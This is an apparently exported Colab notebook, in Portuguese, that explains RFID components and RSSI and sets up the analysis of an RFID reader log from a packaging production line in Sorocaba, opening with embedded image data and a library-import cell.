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)
# + [markdown] id="KTMbVPf596Cy"
# ## O sistema RFID
# O RFID (Radio Frequency Identification) é composto basicamente por 3 componentes.
#
# **Etiquetas:** também conhecidas popularmente como Tags e tecnicamente como transponder. Elas possuem em sua composição um circuito integrado (microchip) ligado à uma pequena antena. Esse chip possui uma memória onde as características de identificação do produto estarão armazenadas e ela transmite essas informações para o Leitor (Reader) quando solicitado.
#
# 
#
#
# **Leitores (Reader):** é denominado como um sofisticado equipamento de rádio que possui em suas principais características a criação, ampliação e envios dos sinais de radiofrequência, receber os sinais das etiquetas e de-modular a informação e organizar os dados recebidos a fim de enviá-los para um computador.
# Uma outra característica dos leitores é de fazer escrita ou gravação de informação nas etiquetas. Abaixo um exemplo de um leitor de RFID.
#
# 
#
# **Antenas:** elas são os condutores da comunicação de dados entre as etiquetas e o leitor. Existem vários tipos de antenas e, devido a isso, é muito importante conhecê-las, pois dependendo da sua aplicação o tipo da antena influenciará muito na performance de leitura. Outro fator importante é o posicionamento da mesma, pois ele impacta na força de retorno de sinal de leitura, o que chamaremos mais adiante de **RSSI**.
#
# 
#
# O **RSSI (Received Signal Strength Indicator)** é na prática um valor que indica a força do sinal de resposta. É usado para estimar a distância entre uma etiqueta e a antena ou simplesmente para restringir a leitura em uma determinada distância. Em algumas aplicações ele pode ser usado para identificar a direção da etiqueta e até mesmo como filtro de validação para criar boas condições de leitura e gravação.
# + [markdown] id="cjy42gHUA5h8"
# ## Caso de estudo
# O trabalho desenvolvido se baseia em um log capturado durante um dia de funcionamento em uma linha de produção industrial de embalagens, em uma fábrica na cidade de Sorocaba/SP.
# <br>Esta linha de produção utiliza um sistema RFID, com Tags inteligentes, que são coladas nas embalagens produzidas para auxiliar o seu rastreamento ao longo do processo de produção automatizado.
# <br>Os dados foram capturados de um leitor RFID ao longo do processo e registra informações como o código único de cada tag chamado EPC, a potência de resposta de leitura da tag (RSSI), o tempo exato de registro de leitura e um status de sucesso na operação de leitura.
# <br>Para cada tag que passa pela antena de leitura sobre a esteira, várias leituras são realizadas da mesma tag, sendo que é necessária uma potência de resposta mínima para ser considerada uma leitura eficaz e válida para o sistema de rastreabilidade.
# <br>A potência de retorno do sinal, que é o foco principal do trabalho apresentado, pode ter influência de diversos fatores, como a qualidade em si da tag, a variação de posicionamento e distância da antena, a velocidade da esteira e a configuração do leitor (Reader).
# + [markdown] id="Gui5UKIH0Cow"
# # Desenvolvimento
# + [markdown] id="QgodK3z2HhKL"
# ## Pré-processamento dos dados
# + [markdown] id="p_mf7K1cHhKL"
# Os dados coletados dos equipamentos chamados READERS geram um log onde as informações são descritas conforme abaixo:
#
# - Hora no formato (HH:MM:SS.mmm)
# - TAG = Informação do número armazenado na memória da TAG, que é um identificador único denominado EPC.
# - ANTENNA = Registro da antena que a informação foi capturada.
# - RSSI = Informação de retorno de potência.
# - TIMESTAMP = Momento em que a informação foi capturada.
#
# É através do parâmetro de RSSI que se pode identificar se a leitura realizada pela antena está boa ou não.
#
# Inicialmente carregaremos o log e iremos fazer um pré-processamento para excluir as linhas que não são referentes às leituras da antena e deixá-lo em um formato mais fácil de se trabalhar.
# + id="RKiPuFB9HhKM" executionInfo={"status": "ok", "timestamp": 1607186252405, "user_tz": 180, "elapsed": 892, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Libraries used throughout the notebook.
import pandas as pd
import numpy as np
import warnings
# Silence ALL warnings to keep cell output clean; note this also hides
# deprecation/future warnings from pandas and numpy.
warnings.filterwarnings('ignore')
